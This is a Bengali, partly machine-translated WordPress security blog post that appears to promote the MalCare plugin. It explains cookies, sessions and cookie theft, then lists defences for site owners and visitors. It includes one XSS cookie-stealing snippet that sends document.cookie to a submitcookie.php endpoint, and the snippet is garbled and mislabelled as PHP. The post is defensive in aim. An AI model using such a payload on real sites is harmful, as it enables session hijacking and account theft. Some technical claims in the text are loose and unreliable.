কম্পিউটার

কিভাবে কুকি চুরি এবং হাইজ্যাকিং সেশন প্রতিরোধ করবেন? (সবচেয়ে সহজ গাইড)

আপনি কি জানেন যে আপনার ওয়েবসাইট গোপনীয় তথ্য সংরক্ষণ করতে কুকিজ ব্যবহার করে? আপনি কি জানেন হ্যাকাররা সহজেই আপনার কুকি চুরি করতে পারে? এটি আপনার ওয়েবসাইট এবং দর্শকদের ঝুঁকিতে ফেলতে পারে!

কুকিজ সব ধরনের তথ্য সঞ্চয় করে - একজন গ্রাহকের বিজ্ঞাপনের পছন্দ থেকে শুরু করে লগইন শংসাপত্র এবং ক্রেডিট কার্ডের তথ্য। কুকিজ ইন্টারনেট জুড়ে ব্যাপকভাবে ব্যবহৃত হয় এবং কত ঘন ঘন সেগুলি চুরি হয় তা ভীতিজনক।

আপনি যদি কুকি চুরি বা সেশন হাইজ্যাকিংয়ের শিকার হন, তাহলে এর প্রতিক্রিয়া মারাত্মক। আপনি শুধু রাজস্ব এবং আপনার দর্শকদের আস্থা হারাবেন না কিন্তু আপনি আইনি সমস্যা এবং মোটা জরিমানাও পেতে পারেন!

তবে চিন্তা করবেন না কারণ আজকে, আমরা এই আক্রমণগুলি প্রতিরোধ করার জন্য আপনাকে যা যা জানা দরকার সেগুলি নিয়ে যেতে যাচ্ছি!

এই গাইডে, আমরা প্রথমে শিখব কিভাবে হ্যাকাররা কুকি চুরি করে তারপর আমরা প্রতিরোধমূলক ব্যবস্থা গ্রহণ করব।

TL;DR : আপনার ওয়ার্ডপ্রেস ওয়েবসাইট সম্পর্কে চিন্তিত? আপনি একটি সেশন হাইজ্যাকিং এবং কুকি স্টিলিং প্রোটেকশন প্লাগইন ইনস্টল করে এখনই আপনার সাইটকে সুরক্ষিত করতে পারেন . এটি নিয়মিতভাবে আপনার ওয়েবসাইট স্ক্যান করবে এবং আপনাকে সতর্ক করবে যদি কোনো হ্যাকার কোনো দূষিত কোড ইনজেক্ট করে যা তাদের কুকি চুরি করতে সক্ষম করে। প্লাগইন ব্যবহার করে, আপনি দ্রুত হ্যাক পরিষ্কার করতে পারেন এবং প্রতিক্রিয়া এড়াতে পারেন৷

বিষয়বস্তুর সারণী

→ কুকি চুরি কি?

→ কিভাবে হ্যাকাররা কুকিজ চুরি করতে ক্রস-সাইট স্ক্রিপ্টিং (XSS) ব্যবহার করে এবং সেশন হাইজ্যাক করে?

→ কিভাবে কুকি চুরি এবং সেশন হাইজ্যাকিং প্রতিরোধ করবেন?

→ ওয়েবসাইট ভিজিটররা কুকি চুরির বিরুদ্ধে পদক্ষেপ নিতে পারে

কুকি চুরি কি?

আমরা যতটা চাই, কুকি চুরি করা ততটা সহজ নয় যতটা একটি শিশু তাদের হাত কুকির জারে আটকে রাখে! এটি একটি জটিল প্রক্রিয়া এবং কী ঘটছে তা বোঝার জন্য, আমাদের মৌলিক বিষয়গুলি স্পর্শ করতে হবে৷

→ একটি কুকি কি?

আপনি কুকিগুলিকে ডেটার ক্ষুদ্র বিট হিসাবে ভাবতে পারেন। এটি একটি ওয়েবসাইটের সাথে আপনার মিথস্ক্রিয়া সম্পর্কে তথ্য সংরক্ষণ করে। উদাহরণস্বরূপ, একটি ই-কমার্স সাইট একজন গ্রাহকের যাত্রা ট্র্যাক করতে চায় - অনুসন্ধান করা পণ্য, কেনা পণ্য, কার্টে পরিত্যক্ত আইটেম বা তারা কোন পৃষ্ঠাগুলি পরিদর্শন করে।

এটি গ্রাহকরা কী পছন্দ করে, কোন পৃষ্ঠাগুলি সবচেয়ে বেশি পরিদর্শন করা হচ্ছে, ব্যবহারকারীরা কতক্ষণ একটি পৃষ্ঠায় থাকেন ইত্যাদির বিষয়ে স্টোরকে বিশ্লেষণমূলক তথ্য দেয়৷ তারপর তারা এই তথ্যটি ওয়েবসাইটটিতে কী প্রদর্শিত হবে তা সাজাতে ব্যবহার করতে পারে গ্রাহকের পছন্দ অনুযায়ী।

কুকিগুলি ওয়েবসাইট মালিকদের কী কাজ করে এবং কী করে না সে সম্পর্কে অন্তর্দৃষ্টি দেয়। এটি তাদের তাদের সাইটে কী পরিবর্তন বা উন্নতি করতে হবে তা নির্ধারণ করতে সহায়তা করে।

ব্যবহারকারীদের কাছে প্রাসঙ্গিক বিজ্ঞাপন প্রদর্শন করতেও কুকি ব্যবহার করা হয়। আপনি যখন ওয়েবসাইটগুলিতে যান, আপনি বিজ্ঞাপনগুলি প্রদর্শিত হচ্ছে লক্ষ্য করবেন৷

কিভাবে কুকি চুরি এবং হাইজ্যাকিং সেশন প্রতিরোধ করবেন? (সবচেয়ে সহজ গাইড)

এই বিজ্ঞাপনগুলি সাধারণত আপনার সাম্প্রতিক অনুসন্ধানের ইতিহাসকে প্রতিফলিত করে৷ উদাহরণস্বরূপ, আপনি যদি গুগলে 'ল্যাপটপ' অনুসন্ধান করেন, আপনি লক্ষ্য করবেন যে সমস্ত ওয়েবসাইটের বিজ্ঞাপনগুলি আপনাকে ডেলের বিজ্ঞাপনগুলি দেখায়। এই বিজ্ঞাপনগুলি ওয়েবসাইটের একটি অংশ নয় কিন্তু Google Adsense-এর মতো পরিষেবা দ্বারা পরিচালিত হয়৷

কুকিজ ওয়েবসাইট মালিক এবং ব্যবহারকারী উভয়ের জন্য জিনিসগুলিকে সুবিধাজনক করে তোলে৷৷ এটি ব্যস্ততা বাড়াতে পারে এবং আরও বিক্রয়ের দিকে পরিচালিত করতে পারে যা ওয়েবসাইট মালিকদের জন্য দুর্দান্ত। ক্রেতার জন্য, কুকিজ তাদেরকে একটি ওয়েবসাইটে আরও ব্যক্তিগতকৃত অভিজ্ঞতা পেতে বা আরও প্রাসঙ্গিক বিজ্ঞাপন দেখতে সাহায্য করে।

কিন্তু অনেক অপূর্ণতা আছে যা আমরা একটু পরে আলোচনা করব।

[শীর্ষে ফিরে যান ↑]

→ একটি ব্রাউজার সেশন এবং সেশন আইডি কি?

আপনি যখন একটি ওয়েবসাইটে লগ ইন করেন, তখন আপনার কম্পিউটার এবং এই ওয়েবসাইটের মধ্যে একটি সেশন তৈরি হয়৷

উদাহরণস্বরূপ, আপনি যখন Facebook লগ ইন করেন, তখন একটি সেশন শুরু হয়। এটি আপনাকে Facebook ব্যবহার চালিয়ে যেতে দেয় (যদিও আপনি ওয়েব ব্রাউজার বন্ধ করে আবার খুলেন) যতক্ষণ না আপনি 'লগ আউট' এ ক্লিক করেন এবং সেশন শেষ না করেন।

সেশনটি তৈরি না হলে, আপনাকে প্রতিবার লগ ইন করতে হবে আপনি নতুন ডেটা চেয়েছিলেন। উদাহরণস্বরূপ, আপনি যদি আপনার Facebook নিউজ ফিড ছেড়ে যেতে চান এবং একটি বন্ধুর প্রোফাইল পৃষ্ঠা দেখতে চান, তাহলে আপনি Facebook থেকে লগ আউট হয়ে যাবেন এবং লগ ইন করতে এবং বন্ধুর প্রোফাইল দেখতে আবার আপনার শংসাপত্রগুলি প্রবেশ করতে হবে৷

কিভাবে কুকি চুরি এবং হাইজ্যাকিং সেশন প্রতিরোধ করবেন? (সবচেয়ে সহজ গাইড)

সেজন্য সেশন প্রয়োজন। এটি আপনাকে লগ ইন করে রাখে যাতে আপনি বিভিন্ন ওয়েব পৃষ্ঠাগুলির মাধ্যমে ব্রাউজ করা চালিয়ে যেতে পারেন এবং ওয়েবসাইটটি নেভিগেট করতে পারেন৷

এখানে যেটা লক্ষ করা গুরুত্বপূর্ণ তা হল প্রতিটি সেশন কুকির একটি সেট তৈরি করে। আমরা এই সেশন কুকি কল করতে পারেন. এবং প্রতিটি সেশন কুকির একটি অনন্য সেশন আইডি থাকে৷

একটি ওয়েবসাইট ব্যবহারকারীকে প্রমাণীকরণ করতে এবং একটি বিশ্বস্ত সংযোগ স্থাপন করতে এই ID ব্যবহার করে।

উদাহরণস্বরূপ, Facebook এ লগ ইন করতে, আপনাকে আপনার ব্যবহারকারীর নাম এবং পাসওয়ার্ড লিখতে হবে। এর পরে, একটি অনন্য আইডি দিয়ে একটি সেশন তৈরি করা হয়। Facebook ওয়েবসাইটে আপনার যেকোন অনুরোধ এই আইডি দিয়ে প্রমাণীকৃত হবে। সুতরাং, আপনি যখন একটি ভিন্ন পৃষ্ঠা দেখতে চান, আপনি সেই পৃষ্ঠাটি প্রদর্শন করার জন্য Facebook সার্ভারে একটি অনুরোধ পাঠাবেন। Facebook আইডি যাচাই করে এবং আপনি যে সামগ্রী দেখতে চান তা প্রদর্শন করে৷

এখন, হ্যাকাররা আপনার সেশন হাইজ্যাক করতে পারে এবং এই বিশ্বস্ত সংযোগের অপব্যবহার করতে পারে৷ তারা আপনার পক্ষে দূষিত অনুরোধ পাঠাতে পারে। দেখা যাক কিভাবে।

[শীর্ষে ফিরে যান ↑]

→ কুকিজ নিয়ে নিরাপত্তা সংক্রান্ত উদ্বেগ কি?

যখন কুকিজ তৈরি হয়, সেগুলি শুধুমাত্র আপনিই দেখতে পাবেন – সাইটের মালিক৷ অন্য কোন ওয়েবসাইট আপনার কুকি দেখতে পারে না. তারা এককভাবে আপনার।

কিন্তু এই কুকিজ ইন্টারনেট জুড়ে ভ্রমণ করে। এগুলি বিজ্ঞাপন পরিষেবা এবং বিশ্লেষণ পরিষেবা দ্বারা ব্যবহৃত হয়। তাই এই কুকিজ সারা বিশ্ব জুড়ে সার্ভার থেকে সার্ভারে বাউন্স করে। সংযোগ সুরক্ষিত না হলে, একজন হ্যাকার সহজেই আটকাতে পারে এবং এই কুকিগুলি চুরি করতে পারে৷

এখন, আপনি ভাবতে পারেন যে যদি একজন হ্যাকার আপনার কেনাকাটার পছন্দ সম্পর্কে তথ্য পেতে পরিচালনা করে, তাহলে বড় ব্যাপার, তাই না?

সমস্যা হল আপনার কেনাকাটার পছন্দগুলি সম্পর্কে তথ্যের চেয়ে কুকিজগুলি আরও বেশি সংরক্ষিত৷ এটি ব্যাঙ্কের বিবরণ এবং ব্যক্তিগত তথ্যও সঞ্চয় করে যেমন আপনার শিপিং ঠিকানা এবং যোগাযোগের বিবরণ।

এই ধরনের তথ্য ভুল হাতে পড়লে, এটি প্রতারণামূলক কার্যকলাপের জন্য অপব্যবহার হতে পারে।

হ্যাকাররা কুকি চুরি করার সবচেয়ে সাধারণ উপায়গুলির মধ্যে একটি হল যদি তারা আপনার মতো একই ওয়াইফাই ব্যবহার করে। এই ধরনের ওয়াইফাই হ্যাকিংকে ম্যান-ইন-দ্য-মিডল অ্যাটাক বলা হয় এবং উভয়ই একই ওয়্যারলেস নেটওয়ার্কের সাথে সংযুক্ত থাকলেই হতে পারে। এই কারণে কখনও পাবলিক ওয়াইফাই ব্যবহার করবেন না যা অনেকের দ্বারা অনিরাপদ বা ব্যবহার করা হয়। একই কম্পিউটার নেটওয়ার্কের ব্যবহারকারীদের ক্ষেত্রেও এটি ঘটতে পারে।

আরও কয়েকটি পদ্ধতির মধ্যে রয়েছে প্যাকেট স্নিফিং এবং ক্রস-সাইট স্ক্রিপ্টিং নামক একটি দুর্বলতাকে কাজে লাগিয়ে। আজ, আমরা আপনাকে বিস্তারিতভাবে দেখাতে যাচ্ছি কিভাবে XSS কুকি চুরি কাজ করে।

[শীর্ষে ফিরে যান ↑]

কিভাবে হ্যাকাররা কুকি এবং হাইজ্যাক সেশন চুরি করতে ক্রস-সাইট স্ক্রিপ্টিং (XSS) ব্যবহার করে?

ক্রস-সাইট স্ক্রিপ্টিং (XSS) আক্রমণ ব্যবহার করে হ্যাকাররা কীভাবে কুকিজ চুরি করে তা আপনাকে দেখানোর জন্য, আমরা একটি উদাহরণ ব্যবহার করব। ধরুন আপনি এমন একটি ওয়েবসাইট পরিদর্শন করেছেন যেটিতে একটি মন্তব্য বিভাগ রয়েছে৷

আপনার করা যেকোনো মন্তব্য ওয়েবসাইটের ডাটাবেসে পাঠানো হবে। আদর্শভাবে, এই মন্তব্য বিভাগটি শুধুমাত্র সাধারণ ইংরেজিতে পাঠ্য গ্রহণ করার জন্য কনফিগার করা উচিত। কিন্তু যদি এটি বিশেষ অক্ষরও গ্রহণ করে, তাহলে এটি এটিকে XSS-এর জন্য দুর্বল করে তোলে।

একজন হ্যাকার তাদের নিজস্ব ক্ষতিকারক কোড লিখতে পারে যা ডাটাবেসে পাঠানো হবে৷ একবার ভিতরে, কোডটি কার্যকর করা হবে। একটি নতুন ওয়েবসাইট অ্যাডমিন তৈরি করা বা কুকি চুরি করার মতো সমস্ত ধরণের দূষিত কার্যকলাপ চালানোর জন্য হ্যাকাররা ওয়েবসাইটে প্রবেশ করতে পারে এমন অসংখ্য কোড রয়েছে৷

কুকিজ চুরি করতে, একজন হ্যাকার নিম্নলিখিত কোড লিখতে পারে:

দ্রষ্টব্য:এটি কীভাবে কুকিজ চুরি করতে হয় তার একটি টিউটোরিয়াল নয়৷ এই নিবন্ধটি হ্যাকাররা কিভাবে কুকি চুরি করতে পারে সে সম্পর্কে ওয়েবসাইট মালিকদের সচেতন করার উদ্দেশ্যে। আমরা আপনাকে কোনো বেআইনি কার্যকলাপ করার পরামর্শ দিই না৷

[php]

document.write('<img src=& amp;amp;amp;quot;https://localhost/submitcookie.php? cookie ='

+ escape(document.cookie) + ‘" />;

[/php]

মন্তব্য বিভাগে, এই কোড একটি চিত্র হিসাবে প্রদর্শিত হবে. আপনি (একজন ভিজিটর হিসাবে) এটিতে ক্লিক করলে, আপনি একটি ছবি দেখতে পাবেন। কিন্তু এর চেয়েও বেশি কিছু ঘটেছে।

যখন আপনি ছবিটিতে ক্লিক করেন, তখন এই PHP ফাইলটি নীরবে কোডটি কার্যকর করে এবং আপনার সেশন কুকি এবং সেশন আইডি দখল করে।

এখন হ্যাকার আপনার সেশন পুনরায় তৈরি করতে পারে এবং সেই ওয়েবসাইটে আপনার মত পোজ দিতে পারে। তারা অনেক দূষিত কাজ চালাতে পারে। উদাহরণস্বরূপ, যদি আপনার কুকিতে আপনার ক্রেডিট কার্ড বা অন্য কোনো অর্থপ্রদানের তথ্য থাকে, তাহলে তারা কেনাকাটা করতে পারে।

সৌভাগ্যবশত, এই হ্যাকগুলি থেকে ওয়েবসাইটের মালিকদের পাশাপাশি এর দর্শকদের রক্ষা করার জন্য প্রতিরোধমূলক ব্যবস্থা রয়েছে৷

ওয়েবসাইটের মন্তব্য বিভাগে এবং ইমেলগুলিতে সন্দেহজনক লিঙ্কগুলিতে কখনই ক্লিক করবেন না। আপনি কুকি চুরির শিকার হতে পারেন। টুইট করতে ক্লিক করুন

[শীর্ষে ফিরে যান ↑]

কিভাবে কুকি চুরি এবং সেশন হাইজ্যাকিং প্রতিরোধ করবেন?

কুকি চুরি এবং সেশন হাইজ্যাকিং প্রতিরোধে দুটি পক্ষ ভূমিকা পালন করে – ওয়েবসাইটের মালিক এবং দর্শক। আমরা উভয় পক্ষের জন্য প্রতিরোধমূলক ব্যবস্থা নিয়ে আলোচনা করব।

ওয়েবসাইট মালিকরা কুকি চুরির বিরুদ্ধে ব্যবস্থা নিতে পারে

একজন ওয়েবসাইটের মালিক হিসাবে, আপনার জন্য এটি পরিচালনা করার জন্য যদি আপনার কাছে নিরাপত্তা বিশ্লেষক না থাকে, তাহলে আপনাকে নিম্নলিখিত প্রতিরোধমূলক ব্যবস্থাগুলি বাস্তবায়ন করতে হবে:

1. একটি SSL সার্টিফিকেট ইনস্টল করুন

ব্যবহারকারীর ব্রাউজার এবং আপনার ওয়েব সার্ভারের মধ্যে ডেটা ক্রমাগত স্থানান্তরিত হয়। SSL ছাড়া, এই ডেটা (কুকিজ) প্লেইন টেক্সটে পাঠানো হয়। যদি কোন হ্যাকার এই তথ্যটি আটকায়, তারা সহজভাবে এটি পড়তে পারে। তাই যদি এটিতে লগইন শংসাপত্র থাকে তবে এটি প্রকাশ করা হবে৷

কিভাবে কুকি চুরি এবং হাইজ্যাকিং সেশন প্রতিরোধ করবেন? (সবচেয়ে সহজ গাইড)

SSL (সিকিউর সকেট লেয়ার) ডেটা স্থানান্তর করার আগে এনক্রিপ্ট করবে। তাই কোনো হ্যাকার চুরি করতে পারলেও, তারা ডেটা পড়তে পারবে না।

আপনি আপনার ওয়েব হোস্টিং কোম্পানি বা একটি SSL প্রদানকারীর মাধ্যমে একটি SSL শংসাপত্র পেতে পারেন৷ এছাড়াও আপনি Let's Encrypt

থেকে একটি মৌলিক বিনামূল্যের SSL সার্টিফিকেট পেতে পারেন

2. একটি নিরাপত্তা প্লাগইন ইনস্টল করুন

একটি ওয়ার্ডপ্রেস নিরাপত্তা প্লাগইন রাখুন যেমন MalCare আপনার ওয়েবসাইটে সক্রিয়। প্লাগইনের ফায়ারওয়াল আপনার ওয়েবসাইটে হ্যাক প্রচেষ্টা প্রতিরোধ করবে এবং দূষিত আইপি ঠিকানাগুলিকে ব্লক করবে। এছাড়াও, এটি নিয়মিতভাবে আপনার সাইট স্ক্যান করবে এবং হ্যাকার দ্বারা কোনো ক্ষতিকারক কোড প্রবেশ করা হলে আপনাকে সতর্ক করবে। আপনি অবিলম্বে আপনার ওয়েবসাইট পরিষ্কার করতে পারেন. এটি আপনাকে এই ধরনের হ্যাক প্রচেষ্টাগুলিকে কোনও ক্ষতি করার আগেই সনাক্ত করতে এবং মুছে ফেলতে সহায়তা করবে৷

3. আপনার ওয়েবসাইট আপডেট করুন

সর্বদা আপনার ওয়েবসাইট আপ টু ডেট রাখুন, এর মধ্যে রয়েছে ওয়ার্ডপ্রেস ইনস্টলেশন, থিম এবং প্লাগইন। পুরানো সফ্টওয়্যারে চালানো আপনার ওয়েবসাইটে অনেক দুর্বল জায়গা খুলে দেয় যা হ্যাকাররা কাজে লাগাতে পারে। নিশ্চিত করুন যে আপনি আপনার সাইট আপডেট করেছেন এবং যখন একটি নতুন আপডেট উপলব্ধ হবে।

কিভাবে কুকি চুরি এবং হাইজ্যাকিং সেশন প্রতিরোধ করবেন? (সবচেয়ে সহজ গাইড)

এই আপডেটগুলি শুধুমাত্র নতুন বৈশিষ্ট্য এবং বাগ ফিক্স বহন করে না, তারা সময়ে সময়ে নিরাপত্তা ত্রুটিগুলিও ঠিক করে৷

4. আপনার ওয়েবসাইটকে শক্ত করুন

WordPress.org নির্দিষ্ট ওয়েবসাইট শক্ত করার ব্যবস্থার সুপারিশ করে যা আপনার ওয়েবসাইটে প্রয়োগ করা উচিত। এর মধ্যে রয়েছে শক্তিশালী এবং অনন্য ব্যবহারকারীর নাম এবং শক্তিশালী পাসওয়ার্ড ব্যবহার করা, অজানা ফোল্ডারে পিএইচপি এক্সিকিউশন ব্লক করা, থিম এবং প্লাগইনগুলিতে ফাইল এডিটর নিষ্ক্রিয় করা এবং আরও অনেক কিছু। এখন, এটি আপনার কাছে শব্দের মতো শোনাতে পারে তাই আমরা ওয়ার্ডপ্রেস হার্ডেনিং-এর জন্য ধাপে ধাপে একটি গভীর নির্দেশিকা তৈরি করেছি যা আপনি অনুসরণ করতে পারেন।

[শীর্ষে ফিরে যান ↑]

ওয়েবসাইটের দর্শকরা কুকি চুরির বিরুদ্ধে পদক্ষেপ নিতে পারে

ওয়েবসাইট ভিজিটর হিসাবে, আপনাকে অন্ধভাবে বিশ্বাস করতে হবে না যে ওয়েবসাইটগুলি যথাযথ নিরাপত্তা ব্যবস্থা নিয়েছে৷ আপনি নিম্নলিখিত ওয়েব নিরাপত্তা প্রোটোকল দিয়ে নিজেকে রক্ষা করতে পারেন।

1. একটি কার্যকরী অ্যান্টি-ভাইরাস ইনস্টল করুন

নিশ্চিত করুন যে আপনি ইন্টারনেট অ্যাক্সেস করার জন্য যে ডিভাইসটি ব্যবহার করছেন তাতে অ্যান্টি-ম্যালওয়্যার সফ্টওয়্যার ইনস্টল করা আছে। আপনি একটি দূষিত ওয়েবসাইট পরিদর্শন করার সময় ম্যালওয়্যার সনাক্ত করা হলে এটি আপনাকে সতর্ক করবে৷ এটি আপনার সিস্টেমে ভুলবশত ডাউনলোড বা ইনস্টল করতে পারে এমন কোনো ম্যালওয়্যারকেও সরিয়ে দেবে৷

2. কখনোই সন্দেহজনক লিঙ্কে ক্লিক করবেন না

হ্যাকাররা ওয়েবসাইট এবং ইমেলের মাধ্যমে মন্তব্য বিভাগের মাধ্যমে ব্যবহারকারীদের টার্গেট করে। অবিশ্বস্ত লিঙ্কগুলিতে ক্লিক করা এড়িয়ে চলুন বিশেষ করে যেগুলি আপনাকে আকর্ষণীয় অফার বা ছাড় দিয়ে প্রলুব্ধ করে।

3. সংবেদনশীল তথ্য সংরক্ষণ করা এড়িয়ে চলুন

কেনাকাটার ওয়েবসাইটগুলিতে ক্রেডিট কার্ডের তথ্য সংরক্ষণ করা চেকআউটকে দ্রুত এবং আরও সুবিধাজনক করে তোলে। ওয়েবসাইটগুলিতে স্বয়ংক্রিয়ভাবে লগ ইন করার জন্য Google Chrome এর মতো ওয়েব ব্রাউজারগুলিতে পাসওয়ার্ড সংরক্ষণ করা পাসওয়ার্ড মনে রাখার প্রয়োজনীয়তা দূর করে!

কিন্তু এটি সব চুরি হওয়ার উচ্চ ঝুঁকি নিয়ে আসে। ওয়েবসাইটগুলিতে সংবেদনশীল ডেটা সংরক্ষণ না করাই ভাল। এটি আপনাকে কয়েক সেকেন্ড বাঁচাতে পারে, তবে এটি আপনাকে আক্রমণের ঝুঁকিতেও রাখে৷

4. কুকিজ সাফ করুন

You can clear your cookies regularly to get rid of any sensitive information stored in browsers like Google Chrome. Access History> Clear Browsing History. Here, tick the checkbox ‘Cookies and other site data’.

কিভাবে কুকি চুরি এবং হাইজ্যাকিং সেশন প্রতিরোধ করবেন? (সবচেয়ে সহজ গাইড)

Choose the time range ‘All Time’ or one that is according to your preference. Next, click ‘Clear data’ and the cookies will be deleted from your browser’s history.

That brings us to an end to cookie stealing. We hope this article has helped you gain a better understanding of what exactly happens and how to prevent it.

This guide from MalCare helped me understand cookie stealing and how to take preventive measures against it. এটা দেখ. Click to Tweet

[শীর্ষে ফিরে যান ↑]

চূড়ান্ত চিন্তা

As a website owner, you need to take protective measures to secure your own interests as well as your visitors, clients, and customers. But we understand that setting up a website and managing it is a hard task.

There is an endless number of things to take care of which is why WordPress security tends to take a backseat many times.

But ignoring the security aspect of your website can prove to be disastrous to all your other efforts.

An easy, quick and efficient solution is the MalCare security plugin. You can think of it as a security guard that you hire. It will work round the clock to regularly scan your website and protect it from attacks. You can rest assured that your website is in safe hands.


Keep your WordPress site protected with
MalCare !


  1. কিভাবে ওয়ার্ডপ্রেস সাইট থেকে ম্যালওয়্যার সরাতে হয় (ম্যালওয়্যার ক্লিনআপ গাইড)

  2. কিভাবে সহজে হ্যাক করা ওয়েবসাইট মেরামত করবেন? (সম্পূর্ণ নির্দেশিকা)

  3. DNS লিক কী এবং কীভাবে এটি প্রতিরোধ করা যায়?

  4. কিভাবে স্পাইওয়্যার এবং অ্যাডওয়্যার প্রতিরোধ করবেন?